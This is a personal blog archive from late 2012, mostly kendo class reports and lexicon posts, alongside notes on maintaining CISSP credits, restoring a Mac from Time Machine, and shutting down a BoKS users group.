And to think... At the end of 2010 I was ecstatic about achieving CISSP status, after weeks of studying and after a huge exam. I loved the studying and the pressure and of course the fact that I managed to snag a prestigious certificate on my first attempt.

Well, the graphic on the left is a variation of my celebratory image of the time. I'm sad to say that I've been slacking off for the past two years, only doing the bare essentials to retain said title. Why? My colleague Rob had it spot on: "It seems like such a huge, daunting task to maintain your CPE." But in retrospect it turns out that he's also right insofar that "it really isn't that much work!".

Let's do some math, ISC2 style!

In order to maintain your CISSP title, you need to earn a total of 120 CPE in three years' time. As an additional requirement, you must earn 20C CPE every single year, meaning that you can't cram all 120 credits into one year. To confuse things a little, ISC2 refer to group A and group B CPE (which basically differentiates between security work and other work). 

Now, let's grab a few easily achieved tasks that can quickly earn at least the minimum required CPE.

That right there is 27 CPE per year, all in group A, which meets the required minimum. it's also 81 CPE out of the required 120 CPE for our three year term.

Of the 120 hours, a total of 40 can be achieved through group B, which involves studying other subjects besides IT security. In my case, the most obvious solution for this is self-study or class room education followed for Unix-related subjects. In the next few months I will be studying for my RHCSA certification (and possibly my SCSA re-certfication), which will easily get me the allowed 40 hours. 

That means I only need to achieve 120 - (81+40) = -1 more CPE through alternative ways :) Additional CPE can be achieved through podcasts, webcasts or by visiting trade shows and seminars. One awesomely easy and interesting way are ISC2 web seminars, which can be followed both realtime and on recordings.

Now, because I've been slacking off the past two years, I will need to be smart about my studies and the registration thereof. I'm putting together a planning to both maintain my CISSP and to prepare for my RHCSA. 

It's time to get serious. Again. ;)

EDIT:

It looks like it's a good idea to also renew my ITIL foundations certification. If I'm not mistaken, that can be counted towards group A of CPE, as ITIL is used in domains pertaining to life cycle management, to business continuity and to daily operations. I'll need to ask ISC2 to be sure.

Also, many thanks to Jeff Parker for writing a very useful article, pertaining specifically to my plight.


kilala.nl tags: , ,

View or add comments (curr. 1)

Slowly moving into a more senior role

2012-11-25 08:55:00

Yesterday was an interesting experience! As I remarked to Nick-sempai: "Whoa, I've never sat this far right in shoukai (詳解)!. What a different view!". Because Renshinjuku Almere is still a relatively new dojo, with a slow growth and retention rate, I'm already moving further towards the right of the shimoza (student seating). This is only in part due to my personal progress, but mostly due to the skewed balance between beginners and kendoka in bogu. While I am aware that I'm making good progress towards my first real grading I won't delude myself into thinking I'm getting good at kendo ;)

So what was so interesting about yesterday? That skewed balance and its results! For example, yesterday we had six guys in bogu (incl Ton-sensei) and twelve beginners in uniform or normal sports gear. That's why we ran class using the motodachi system, where groups of beginners line up to train with more advanced students. Yesterday's class forced myself and the others (none of whom have a dan grade) to think and act like proper seniors to the beginners. Instead of spending class training our own kendo, we paid proper attention to theirs while providing encouragement and corrections when needed. I enjoyed it a lot and it was a great learning experience!

After kihon practice in the motodachi rotation, the beginners went with Bob-sempai to train kirikaeshi and other basic techniques. The four of us spent another half hour doing jigeiko under the watchful eye of Ton-sensei. Because Nick-sempai was preparing for today's shinsa (exams), Ton wanted us all to focus on clean and basic kendo. Dou-strikes won't be needed and cleanly break from taiatari instead of trying hiki waza

Some pointers that I got:

Now, with regards to my own first grading I've heard a lot of different things. Originally my goal was to test in the winter of 2013, but I'm thinking of moving it forward to the summer of 2013. Some of my sempai will also be testing in the summer, so I'd love to join them.

In order to prep for the exams, I've made this shortlist of things that I must improve before the test.

  1. Kirikaeshi, coordination of hands and feet.
  2. Footwork, so no flat feet and no stepping through. 

All other things will slowly and gradually keep improving. But these two really require my attention. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Handiwork: shinai repair and modification

2012-11-23 22:59:00

Shinai and suburi shinai

Tonight was well spent :)

I managed to fix a further three shinai using the spare parts Ton-sensei left me and that Bert-sensei donated. Two shinai of the dojo and one of my own are now in tip-top shape again. As a side project I took a bunch of broken or split take and created a suburi shinai for inside the house. At 85cm it's still a bit too long (a wrong swing will hit the ceiling), but at least it's usable :)

Also, at 85cm it's much too long to be used officially as a kodachi (regulation size is 62cm), but maybe it'll be usable for some practice anyway ( ^_^)


kilala.nl tags: , ,

View or add comments (curr. 0)

Studying kata under a different teacher

2012-11-20 18:36:00

Last tuesday was an interesting class in Amstelveen: in preparation for the shinsa (kendo exams) next sunday our students were studying kata. While we study kata on a weekly basis in Almere, in Amstelveen it's a much rarer occasion. 

I was asked by Bert Niezen-sempai to join him in practicing kata. While he's more experienced in kendo than I am, he indicated that he'd like my help in kata. We learned a lot, under the watchful eye of Ran-sempai who spent the better part of 45 minutes coaching us personally. During the practice I was always uchidachi ("attacking sword"), while Bert was shidachi ("receiving sword"). He had a lot of points for improvement, the following for me.

After kata practice we immediately went into 20 minutes of jigeiko (only preceeded by three rounds of kirikaeshi). I did three rounds where, sadly, I got progressively worse. My round against Zicarlo-sempai was pretty good and he helped me a lot! Against Onno-sempai I got worse insofar that I started shutting down. Finally, against Bertolino-sempai I excused myself because I noticed that I really wasn't acting properly. My head was mostly hazy and I was slow to react, or not even reacting at all. 

Learning points:


kilala.nl tags: , ,

View or add comments (curr. 0)

Studying kata

2012-11-17 22:06:00

The time has come to prepare for the 2012 NKR shinsa (kendo exams). As we already mentioned, the exam consists of four parts:

Many things have already been said about kirikaeshi and jitsugi, so let’s spend a little more time preparing for the kata exam!

Background

In his 2012 book “Kendo Coaching: tips and drills”, George McCall writes on the subject of kata:

If we look at the word KATA in Japanese, its usually rendered as å½¢. However, the actual proper usage is åž‹. Both read the same, but what’s the difference? The former simply means “shape” or “form.” It describes the form that something is in, what it looks like. The second kanji, on the other hand, is the thing that is used to create items of the same shape, in other words, a cookie cutter like device. 

Kendo-no-kata can therefore be thought of as a kendo shaped cookie cutter and the students who practice it cookies (hopefully kendo shaped). Although non-Japanese readers might not be interested in the difference, I think that one of the main purposes of kata study is revealed: i.e. kata training was/is traditionally thought of as one of the main vehicles to teach people correct kendo.

Kendo kata help us study proper posture, maai as well as seme. By practicing sword fighting in a simulated and choreographed fashion we can focus completely on the intricacies of our body, of our movements and of the connection with our opponent. We also learn to judge distance, which helps us in our kendo.

Also, while kendo is an abstraction of true sword fighting, the kendo kata approach “real” fighting closer. Both the techniques used, as well as our bokken help us understand the more serious side of our art which entails life or death situations. They’re no kenjutsu of course, but the kata are absolutely a useful tool in understanding and learning kendo.

Some suggest there is also a spiritual side to kendo kata. In Inoue-sensei’s “Kendo Kata: essence and application” it is said that kata #1 through #3 show the progression of a kenshi in his studies. While at first he will win a fight by outright killing his opponent, he will then move on to win by only dismembering. Finally the kenshi will grow so far that he does not have to strike at all, winning by pure seme(kata #3). The UK kendo foundation has some further reading on this subject.

Preparation

Students first learning about kendo kata are advised to first observe a number of videos. The web is rife with kata videos, so we’ve taken the time to choose a number of good ones.

First up, there is a series of classic AJKF training videos (in Japanese). They are a bit dated, but they go over each kata in exquisite detail by filming from various angles and by zooming in on important parts. They also show examples of what not to do. Below are the first four kata, the other videos can be found under the YouTube account that posted these videos.

Another excellent video was made by Kendo World at the 2012 keiko-kai. While it only shows each kata once or twice, the demonstration is still very impressive.

Advanced reading

Should you be inclined to deeply study each kata in written form, then we heartily recommend Stephen Quinlan’s “Nihon Kendo no Kata & Kihon Bokuto Waza”. In this excellent and thorough document (free PDF) mr Quinlan analyzes each kata, which is accompanied by many photographs.


kilala.nl tags: , ,

View or add comments (curr. 0)

Preparing for shinsa

2012-11-14 22:07:00

In less than two weeks time the NKR will host its semi-annual kendo grading exams, at the November centrally training. A number of our Renshinjuku students will take part in these examinations in order to test their current level. For many of them, this will be their first grading outside our own dojo, so we would like to take this opportunity to provide some information on the subject.

According to the NKR website, the requirements for kendo examinations are as follows:

The kata requirements differ per level. Ikkyu aspirants need to demonstrate kata#1through #3, shodan will show #1 through #5, nidan goes up to #7 and anything above nidan will display all ten kata. Aside from above requirements, there are also some formalities to clear, such as minimum age and a few payments.

For the purpose of this document I will limit myself to the ikkyu grading as I have no experience at all with the higher levels.

Before the grading, or shinsa, even begins there is the matter of proper presentation. If a shiai (tournament) would be compared to a business meeting, then a shinsa would compare to a gala: at the prior you are expected to dress and behave well, at the latter you are to act your very best! Apply proper personal care (nails clipped, hair properly kept, shaven if applicable) and make sure your equipment looks the part (proper maintenance, no loose ends, repairs where needed). Remove all dojo markings from your uniform and also remove your zekken. Make sure you wear your uniform and bogu neatly: no creases in the back, all himo at the same length, all himo lying flat, etc.

In kirikaeshi remember that it’s not a test of speed, but a test of skill. Show your best kirikaeshi by not rushing through it, but by paying attention to all details: footwork, timing, upswing through the center, downswing at an angle. Strike men at the proper angle and height. You are trying to strike ippon every time. As Heeren-sensei has pointed out repeatedly, your kirikaeshi should be performed in one kiaiand breath.

Fighting in jitsugi should not be compared go shiai kendo, but instead is more alike to the jigeiko we do in class: it is not a fight for points. Instead, it is a fight to show and test skill. Do not be preoccupied with scoring points and with defending against your opponent. Focus on ensuring that the both of you show your best and high quality kendo. Show a
connection between yourself and your opponent, show proper seme, show zanshinand show an understanding of your opponent’s actions.

The kata examination should show a similar connection with your opponent. Kataare not a simple choreography, kata are a study in forms of a proper sword fight. If possible, take it even more seriously than jitsugi or jigeiko as the bokken represents a real blade. Make sure that you have memorized the forms beforehand, then lock eyes with your kata partner and commence the “dialogue” that each exercise is.

In all of the above examinations kiai is key. I was once told that “in the early stages of kendo, >95% of kendo is kiai“. Whether that is really true is another thing, but the essence of the matter is that kiai is important. It regulates your breathing, it vocalizes your intent and assertiveness, it impresses your opponent and it is part of yuko datotsu. Without kiai there is no spirit, without spirit there is no kendo only stick fighting.

At this level, the gakka (written exam) focuses on basic knowledge of kendo. Terminology, equipment knowledge, basic concepts as well as rules and safety are topics you may expect to find on the test. In preparation ensure that you are familiar with most of the terms in our dojo’s lexiconThe AUSKF also has an excellent gakka study guide, listing some of the common topics that you can be questioned on, including suggestions on what to study.

If you have questions about the upcoming shinsa, please feel free to ask your teachers. If you feel that you need feedback on your kendo in the next few weeks, please indicate this to your teacher.


kilala.nl tags: , ,

View or add comments (curr. 0)

Finally a chance to test my backups

2012-11-13 21:46:00

Restoring from Time Machine

I've always been pretty "okay" about making backups. For years now I've been pulling drive images of both our Macbooks every month or two and both our systems run hourly backups to our NAS. Huzzah for Time Machine! Well, this weekend I got the chance to test our backups!

Having been bitten by the MMORPG bug after watching to much of SAO, I decided to save a lot of time (and money?) by closing the tab with worldofwarcraft.com and by reinstalling Warcraft 3. A few years back my brother-in-law Hans had given me the game for Christmas, so I still had the discs lying around. But! They're for PPC Macs only and obviously my Macbook has an Intel processor. Luckily you can download a Univerisal Binary version of the game through Battle.net (Blizzard's online store etc), after entering your CD keys. Which i promptly did.

Turns out that the whole Warcraft 3 game is a Universal Binary, except the bloody installer! WTF Blizzard?!

The solution is easy, yet stupid: install Snow Leopard (Mac OS 10.6) onto an external USB drive, which still has Rosetta (OS X's way to run PPC code on an Intel system). Everything went fine and I got the game installed. But when I tried to reboot to my Macbook's internal drive, I was greeted by the dreaded blinking question mark. Fudge! ( =_=)

The boot drive had gotten corrupted along the way. I have no clue whatsoever why, but it did. The only course of action, after I couldn't get the full disk encryption to open up, was to re-image the drive and restore from backups. The first part was easy: hook up my backup drive, boot from USB install stick and use Disk Utility to re-image. But then came the restore from Time Machine

As a Unix admin I was over thinking the whole process! I was afraid that, if I were to simply reconnect the Time Machine backup drive, the TM software would erase everything and overwrite it all. So instead I tried to use the good old Migration Assistant, which usually is a great idea. But no matter what I tried, it failed: MA wouldn't see my backups over the network and they wouldn't show up when connected locally over USB either. Turns out there are two good reasons for this:

  1. MA is meant to migrate from another system and because the backups were for this system, MA was ignoring them.
  2. TM backups made over LAN have a different structure than TM backups made onto a locally connected drive. 

Turns out that what I was afraid of, really is the right way. So here's the course of action that works:

  1. Re-image the drive, or do a clean install.
  2. Verify that the basic restore works properly.
  3. Use this command to temporarily enable the showing of hidden files in Finder.
  4. Configure Time Machine to connect to your original backup location. 
  5. Start a backup, which will first do a full inventory of what's there.
  6. When the actual file transfer starts, cancel to save time and space.
  7. Enter Time Machine. Browse to your last good backup date+time.
  8. Select your home directory and select all directories you want, including Library.
  9. Press restore and watch in awe as the counter of files quickly rises.

It could be that your restore borks once or twice, because a file is being locked by a running process. Most likely this is a cache in Library, or a plist locked by iCloud syncing. You could temporarily turn off all syncs and remove the offending files.

In my case, over 126.000 files were restored ringing in over 32GB.


kilala.nl tags: , ,

View or add comments (curr. 0)

Sword Art Online: as kendoka this irks me

2012-11-10 17:16:00

Kendo mistake in SOA

Over the past few weeks I've been following one of 2012's hit anime: Sword Art Online (trailer). I love the art work, the music, the character designs, the plot and the character development. It really is an awesomely engaging show.

It is because I love this show so much that the above screencap irks me so! They put so much effort into the show, but then make such a basic mistake! If Suguha (Kazuto's niece) is such an accomplished kendoka, who's been practicing kendo for over ten years, then she would not put a shinai with its tip down to the ground! WTF A-1?! 

ヽ(#`Д´)ノ


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Wow, a great night of kendo

2012-11-07 07:44:00

Last night turned out to be excellent!

What with the bad weather I'd left home a bit early so I'd be in time to pick up Charl from the P+R at Diemen. I arrived in time, but his bus didn't. Running almost half an hour late we stumbled into the dojo while almost everyone was already dressed. I was affraid we wouldn't be able to join in, but luckily we were simply welcomed in. It certainly was one of my fastest attempts at getting dressed ;)

Having missed the running, we joined in with the stretches and suburi. In the middle of stretching I was approached by Bert-sensei, to quickly talk about getting some replacement take for my shinai (which broke recently) and the ones I'm repairing for the dojo. He indicated that I could grab a shinai of my liking from the spares box, to take apart. Awesome! He also gave me a koban shinai (a practice sword with an oval handle) as a present. Double awesome! ( ^_^)/

During seiretsu, Heeren-sensei indicated that we will be using the next few weeks to prepare for the NKR shinsa (25th of november). This means that we will not be focusing on shiai kendo, but on clean and proper kendo. Focal points for the next few weeks are seme, ki-ken-tai ichi, and zanshin. Pay close attention to your posture, to your footwork, to your strikes, so you can demonstrate your ability at its best.

In accordance with our study goals, today's class focused on kihon practice just like last week. Using the motodachi system we practiced kirikaeshi, oki men, chisai men, oki kote-men, chisai kote-men, oki dou and repetitions of men, kote-men, dou, kote-men-dou. Students were encouraged to display proper kiai and to the timing of their footwork, which should match their strikes.

Funny thing: class started out in mawari geiko style (rotating the whole group), but was switched to motodachi style right before I was switched to the shidachi side. In a later chat with Heeren-sensei he told me he was very curious how I would deal with that situation, knowing about  my problems with breathing and panic. Whenever I'm on the shidachi side I'm bowing out pretty early, but now that I was on the motodachi side he knew I was stuck: I have a responsibility to the people on the shidachi side, because without me in my spot those people cannot practice. As Marli said when I explained this: "Booooy, he's got you pegged! He knows exactly how to get to you!" and she's right :)

Well, it worked: the added responsibility meant that I finished class just about completely and I didn't bow out from kihon practice. I am very happy that I pushed through for the shidachi I practiced with and I learned a thing or two. Sure I got tired quickly, but that was solved by foregoing my own practice two or three times: let shidachi practice, then skip my own drill to catch my breath.

Heeren-sensei took a little time to demonstrate that oki dou starts out looking like a normal men strike. You start going for men and when your opponent raises his shinai to parry, you bring your shinai to your shoulder (or sometimes higher) and strike dou. As always it is important to:

Heeren-sensei indicated that, to practice this dou strike, it is best that motodachi does not open up dou beforehand but that motodachi should only start opening when shidachi moves to strike men. He also suggested that, when paired against someone considerably shorter than yourself, you can slightly lower your posture by sinking down on your legs a bit.

Kihon practice was followed by fifteen minutes of jigeiko and of course kirikaeshi. After two rounds of geiko (thank you Charl, thank you mr Goto) my breathing got the better of me and I had to bow out. After a short recuperation I joined the bogu-less group to practice some oki kote-men and chisai kote-men with Raoul-sempai. I'm very happy that Raoul saw improvement in my kendo since the last time I'd practiced with him. He indicated that my right hand was still a bit too tense and thus too slow, but in general he saw improvements!

After class, Heeren-sensei reiterated that we need to practice proper and good kendo for the examinations. He also informed us that, starting next Saturday, class will include kata geiko which is also needed to prepare for the exams. He advised everybody to prepare by researching the kata they need to know and to watch a few videos. He also asked the kendoka with kata experience to provide guidance to their classmates.


kilala.nl tags: , , ,

View or add comments (curr. 2)

Coactive coaching: DO-DONT structure

2012-11-05 07:35:00

dont bark do restrain yourself

Recently I started a coaching process with Rockover Coaching (about which I'll write more later). In our third fruitful session I was assigned a bit of homework: make a structure for use in the office, to remind me of some of my personal DOs and DONTs.

In this case the DONT is my at-times hyperactive approach in communicating: too fast, not letting people come to their conclusions, sticking my nose in and generally forcing an opinion. The DO is the polar opposite of this, which I have already set as goal for 2012: enryo, self-restraint, calmness and respect. The intention of the structure is to put something in place that inherently reminds me of these DOs and DONTs at any given time, so I chose to hang up a poster at my desk.

Looking for graphics that trigger the DO and DONT in my mind, the DO is obviously represented by the kanji for the word "enryo" (as discussed before). When it came to the DONT one thing immediately popped into my head: Dexter's Laboratory's talking dog. The overly excited, busybusy, shouty dog who yelps for attention exclaiming that "I FOUND THE THING! THE THING! I GOT THE THING!" Or that's how it went in dutch, in english apparently it's "found you", but hey.

So... The above poster is what I whipped up in a few minutes and as per this blogpost it's delivered to my coach. There you go sir! ;)


kilala.nl tags: , , ,

View or add comments (curr. 3)

Oh iPhoto, you crazy!

2012-11-04 11:12:00

iphoto you crazy

I've fought with iPhoto before and by now I'm not nearly as happy with it as I used to be. Could be that it's getting wonky now that we have 16.000+ photos in there, but who knows. The screenshot above was just the latest bout of craziness :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Kendo lexicon: seiretsu and dojo

2012-10-28 22:08:00

For many of our new members, all the Japanese terms used in class can be confusing. From my own experience I know it’s taken me months to get to know most of the common terms. Of course students can find help in the glossary compiled by our teachers, but at times a bit of extra explanation may be helpful.

We continue our series of explanatory articles with commands from the line-up. We will also provide an explanation of dojo layout.

As noisy and violent kendo class may be, there are two moments that form a stark contrast: at the beginning and end of class all students line up to thank their classmates and teachers and to meditate. The dojo is plunged into quiet, while students prepare their armor and ready themselves. Usually it’s the highest ranking student (not the sensei themselves) who call out the following commands.

The preceding paragraphs have already mentioned a lot of terms describing parts of the dojo. Below is a drawing of the Amstelveen dojo, with the most important terms shown in the right location. Both the drawing and the lexicon below could only have been made because of Dillon Lin’s excellent article on dojo layout.

The following list is ordered from the entrance, towards the highest and most important position in the room.
A few other elements often seen in dojo, but not ours are:

Our Amstelveen dojo may have neither of these two, but one could argue that the flag replaces the kamidana. Our flag is there to remind us of the dojo motto and to act as a reminder of the required frame of mind.

As always, I would like to thank Zicarlo for reviewing this article.


kilala.nl tags: , ,

View or add comments (curr. 0)

Kendo class and 'career' planning

2012-10-28 08:45:00

Lately the teachers at Renshinjuku kendo dojo have been pushing the students to challenge themselves. They're getting as many students as possible to enroll in the dutch national champioships and they also want students to prepare for their exams. Sadly I can't join the NK (due to planning) and I don't feel I'm ready to take the exams either. Kris-fukushou confirmed this to marli, when they were having a chat while I was dressing: if I were to go for ikkyu now I'd definitely not make the grade, but if I work hard I can definitely give it a good shot next winter. And I will!

I'll discuss the matter with Heeren-sensei, Loyer-sensei and both Hillen and Kris, to see what they think I need to work on the most.

Saturday's class got off to a slow start. People came in a bit too late, so we only got things on the road by 0925. In the end, turnup was not bad with eight guys in bogu and about a dozen beginners without armor. We started with the usual warming-up, after which we quickly went into seiretsu. While Loyer-sensei took the utmost beginners aside, the novices joined the more advanced group for kihon practice. The guys in bogu acted as motodachi, while the novices practiced oki-men and oki-kote-men

Then, waza practice! We started with basic kirikaeshimen and kote-men drills, then quickly moving onto more advanced materials: double hiki-men, hiki-kote-men and hiki-men-kote-do. As Kris and Hillen explained, the object is to push the envelope on our grasp of distance and footwork. In these drills it's no use to over-think your actions as a lot of it comes down to feeling what you're doing. You do an exercise, then you very quickly analyse your actions and then go on with another drill. The basics come down to:

  1. Start in taiatari.
  2. Your left foot moves backwards while your shinai moves back just enough to get a clear shot.
  3. You fumikomi when striking and land about a foot behind where you started.
  4. The second strike is made with fumikomi in the exact same spot.
  5. The third strike is made in the same spot, with the fumikomi launching you backwards.

As was said, if you overthink this then you'll just get stuck as I did. I tried to do the exercises in slow motion, but then everything fell apart. Instead, try it at 0.8 or really just 1.0 of the desired speed. 

The latter part of practice was spent on reacting to motodachi's men and kote attacks. We were free to try any techniques we like, so I focused on debana-kote, ai-kote-men and kaeshi-men. For those people joining the NK next week, we did short practice shiai. I fought Tiamat-sempai

Individual pointers I received from my teachers:

Class was closed with some reminders from the teachers.


kilala.nl tags: , ,

View or add comments (curr. 0)

Kendo lexicon: warmup and suburi

2012-10-24 22:09:00

For many of our new members, all the Japanese terms used in class can be confusing. From my own experience I know it’s taken me months to get to know most of the common terms. Of course students can find help in the glossary compiled by our teachers, but at times a bit of extra explanation may be helpful.

We continue our series of explanatory articles with words and phrases from warming up.

We will start with a list of common stretching positions, which you will hear every week when training in Amstelveen as large parts of class are conducted in Japanese. Funnily enough, in Japanese “stretching” is a loanword from english: ã‚¹ãƒˆãƒ¬ãƒƒãƒ (su-to-re-chi).

After stretching, we proceed to suburi (素振り), lit. “practice swing“, from ç´  (plain, natural) and 振り (swing). You will often also hear this called “empty strikes” as we are performing strikes without hitting any target. There are many kinds of suburi,where the following are the ones most often performed in our dojo.

As part of the instructions for suburi you will often hear additional commands.
  • Kamae to (構えと) Stand in chudan no kamae.
  • Mae & ushiromae (前 & 後ろ前) Respectively forwards and backwards. You will hear these in exercises like the square/box or cross.
  • Hidari & migi (å·¦ & 右) Respectively left and right. You will hear these in exercises that incorporate sayu men strike, like the aforementioned square/box/cross.
  • Ni-ju pon, san-ju pon, yon-ju pon etc. Literally “20 count”, “30 count”, “40 count”. Basically, the amount of suburi you are expected to do. It is suggested that you learn to count to at least 100 in Japanese.

With many thanks to Kiwa-sempai for providing the list of stretching commands and to Zicarlo for providing more help on kanji on missing terms.


kilala.nl tags: , ,

View or add comments (curr. 0)

There's something you don't see every day

2012-10-18 15:54:00

A molten sakigomu

I'd invited some of my classmates over for kendo equipment maintance and last night Sander joined me. I enjoy these evenings, not just because I like fixing equipment, but they're also a great chance to just shoot the breeze with people I normally only talk to in the dressing room. Well, that or we're bashing each others' heads in ;)

Before Sander's arrival I'd already sorted through Ton-sensei's bit bucket to see what's available. I had to get rid of a bunch of tsukagawa (handle covers) because they were covered in mold. Ditto for some of the sakigawa (tip cover). I quickly put everything into their own bags, to keep things tidy.

We got started on our own shinai, after which we moved on to a bunch of loaner shinai from our dojo. My own shinai had a broken take, after last tuesday's horrible night. Luckily the take was recoverable after getting rid of the split-off piece. Obviously I'll let the guys at the dojo check it over first, to make sure I'm not putting anyone in danger. Sander's shinai were still in good condition, so he was done pretty quickly.

Then! On to the loaners! While Sander worked on one of the adult's versions, I patched up the two kids' shinai. The first one went pretty quickly, but the second one provided a surprise! See the picture above: the sakigomu (a plastic or rubber stopper in the tip) had melted! I've never seen that before! The molten rubber had cemented the take together and the sakigawa was also hard to remove. In the picture above I've outlined what was left of the rubber in white. The part that sticks out on top was completely gone! :D I guess someone left that thing lying right next to a heater or something. I managed to clean everything up nicely with some turpentine, but now I need to dig through the bit bucket to find another sakigawa in the right size. 

I'm very happy for Sander, who completed his very first complete tear-down and build-up last night! He completely disassembled the loaner shinai, replaced one of the take (too worn down) and he even re-tied the sakigawa to a new tsuru. Great job! That knot is a bit of a challenge! I know I'm keeping one of the worn, cut-off sakigawa for reference ;)


kilala.nl tags: ,

View or add comments (curr. 2)

That didn't go too well (some good stuff as well)

2012-10-17 07:44:00

All of yesterday I'd been feeling crappy, so I wasn't altogether too confident going to kendo. It was nice going together with Herman and Charl though :)

As I'd feared I had to bow out during kihon practice, because I was soo tense and out of breath that I'd keel over if I didn't. I don't know what was up yesterday, but all my muscles are/were tight as heck and my breathing patterns were a complete mess. Meh. So I quickly joined Roelof-sensei and Herman at the beginners' side. There I practiced oki-men, sayu-men and the semete-men movements we've been working on for the past weeks.

Pointers that I was given during class:

During class I noticed that I'd cracked one of the take on my newer shinai. ( ;_;) I guess Roelof-sensei sure had a point when he said I was hitting too hard. I'll see if I can fix that tonight, otherwise I'll find another solution.

EDIT:
When it comes to good stuff (it's not all bad), I've been writing a lot for the new Renshinjuku kendo dojo website. Aside from summaries of the classes I attend and some news posts about kendo events, I have also started a series of lexicographical articles. I know from experience that all the Japanese terms and phrases can be confusing for beginners, which is why I want to take the time to explain them. Of course there's the dictionary list compiled by our teachers, but that only provides translations and little explanation.

First up in the series is an explanation of the various types of geiko ("training"). Next up, to be published on sunday, is an explanation of all the commands used during warming-up and the various types of suburi. In the near future I'll also write about the commands in seiretsu (plus some background on dojo layout) and about our equipment.


kilala.nl tags: , , ,

View or add comments (curr. 2)

Kendo lexicon: keiko

2012-10-14 22:10:00

For many of our new members, all the Japanese terms used in class can be confusing. From my own experience I know it’s taken me months to get to know most of the common terms. Of course students can find help in the glossary compiled by our teachers, but at times a bit of extra explanation may be helpful.

We’ll start off this series of lexicon posts with the types of keiko.

The word keiko itself means “practice”, “study” or “training” and consists of two kanji, ç¨½ (kei, to think/consider) 古 (ko, old). One could say that everything we do in the dojo is keiko.

With many thanks to Zicarlo for advising on the additional meaning of various kanji.


kilala.nl tags: , ,

View or add comments (curr. 0)

Hillen is back!

2012-10-13 12:51:00

Today started with a pleasant surprise: Hillen has returned to join Loyer-sensei and Kris-fukushou in teaching us. We also had a lovely, large group of 21 today with two fresh faces and four guys still working their way to wearing a uniform. With eight or nine guys in bogu it might not be much, but for Almere that's a decent show :)

After kata practice and warming up we quickly proceeded with kihon practice. Loyer-sensei took the newbies aside for the basics, while the beginners practiced men, kote-men and kote-men-do on motodachi in bogu. It gives me great pleasure to see that, in mawari geiko, the fundamentals of reiho are now falling into place. Beginners and advanced folks alike take the apropriate approach: bow (onegai shimasu), step into kamae, do your exercise, back into kamae, sheathe your shinai and step back, bow, then bow again when everybody's done (arigatou gozaimashita) and kotai towards the next partner.

The beginners then joined Ton-sensei with the newbies for further kihon training, while those in bogu proceeded with waza. Chiisai kote-men, kote kote-men, men debana-kote, men hiki-men ai-men and men kaeshi-do. Each of these exercises was performed two or three times and in between were one-minute rounds of jigeiko to further practice.

In all these exercises, Kris-fukushou reminded us of the importance of building tension, of proper footwork and of feeling the proper distance and chance to make your strike. Try to use different approaches in stepping in: sometimes edge your way in sneakily, sometimes boldly step and strike. In debana-kote don't simply step aside, but first step in when striking; then move aside. In both debana-kote and hiki-men keep your movements tiny, else you are simply too slow. With all these exercises it is imperative that motodachi give his best attack! Without a proper chiisai-men, you cannot practice a proper kaeshi-do! So don't just try and whack something, make it your best strike!

Class was closed with three rounds of uchikomi geiko (third round was kakari geiko for those in bogu). Everyone was pitted against Kris-fukushou, Hillen-sensei, Raoul-sempai and Charl-sempai

At the end of class all three teachers had some closing remarks.

Pointers that I received individually:


kilala.nl tags: , ,

View or add comments (curr. 0)

Back to training

2012-10-10 08:24:00

In the absence of Heeren-sensei, class was led by Tsuyuguchi-sensei with Ran-sempai handling the translations. And with Kiwa-sempai gone for the day, Loek-sempai took care of the warming-up. After some initial confusion about the day's structure (no motodachi system, yes motodachi system, semi-motodachi system, beginners along with the bogu group) we got settled into some hard work! Who'd have thought? Even classes in Amstelveen can get a little disorganized :)

Emphasis was placed on basics: kirikaeshi, oki-men, hayai-men, hayai kote-men, men-hiki-men men-hiki-kote men-hiki-do. Tsuyuguchi-sensei impressed upon us the need for:

After a further twenty minutes of jigeiko, class was closed with parting remarks by Roelof-sensei.

During practice I also received some personal advice.

Class was hard work and I enjoyed it a lot. I brought along Herman and Charl from the Almere dojo, which was a nice change :)


kilala.nl tags: , ,

View or add comments (curr. 0)

BoKS Users Group: an ending

2012-10-08 19:46:00

BoKS Users Group website

Almost two years ago I let go a volunteer project that I'd started, Open Coffee Almere. The project had out-grown me and in order to prosper needed someone else in charge. So I passed the project on and stepped back completely. 

Another project that was started at roughly the same time, but which never really took off is the BoKS Users Group. Meant to unite FoxT BoKS administrators across the globe in order to share knowledge, it was mostly me trying to push, pull and shove a cart of rocks. A lot of people said it was a great idea and they'd love to join, or to provide input or to benefit from it. But none of that ever really happened. 

And then even I stopped pushing updates to the website. Hence why I've decided to pull all the content back into my own website and to shutter the site. I'll probably also give admin rights of the LinkedIn group to FoxT and that's that. 


kilala.nl tags: , ,

View or add comments (curr. 2)

Fumetsu Cup 2012

2012-10-01 20:46:00

Thomas standing in line

Looking at the picture Peter-sempai shot of me, waiting in line for the shinai check, game me a sudden glimpse into my future. Will I look like Roelof-sensei in thirty years?

Yesterday I attended the 2012 Fumetsu Cup kendo tournament in Vlaardingen. A few weeks back I'd indicated that I would really like to compete and Marli was sweet enough to accomodate me. While I galivanted off to the Rotterdam area, she spent her sunday with our daughter. She's awesome <3

The Fumetsu Cup, as described by the NKR in the invitation: "The Fumetsu Cup is the yearly held surprise tournament in which all participants are randomly divided into teams of three persons. With their team they will compete for the cup. Teams will be captained by an experienced kendoka."

It's great fun because you get to meet people you normally might not and you're driven way out of your comfort zone. Instead of fighting with kendoka from Renshinjuku, my team was pitted against one of them. Unfortunately the last sentence of the description wasn't true for my team as all three of us were mudansha: combined we had about five to six years of experience and none of us even had our ikkyu. Hence why we were outed from the tournament after our three fights in the first round. Oh well :) I enjoyed teaming up with Kerstin (from Museido in Amsterdam) and Erik (from Shinbukan in Groningen); they were great people to meet and I learned from them in the short time we spent together.

In my three fights I matched up against Laurens from Suirankan, Ms Cha who at one point used to be with the UK Hizen dojo and Wim from Shinbukan. I really should have done a short practice round before the actual matches because I had the same problem that Kerstin had described: in the first fight I'm still "asleep", not properly alert. 

Afterwards I asked some of my sempai for their opinion on how I'd performed.

As I'd told Nick last saturday, my goal for the day was to at least show some proper kendo. I didn't want to make the same stupid mistakes like last time and I wanted to last at least a full, real match. Aside from the fight against Laurens I'm satisfied in that regard. Plenty to learn though! :) My thoughts were all over the place, I was focusing on too many things and yes I kept on dancing. Always dancing :(

EDIT:

I've had a chat with Wim and he remarked that I showed good kiai and that I was plenty greedy. I'll view the prior as a good thing, but the latter could swing either way. I could have been too greedy, like last time, or I could have shown proper assteriveness.

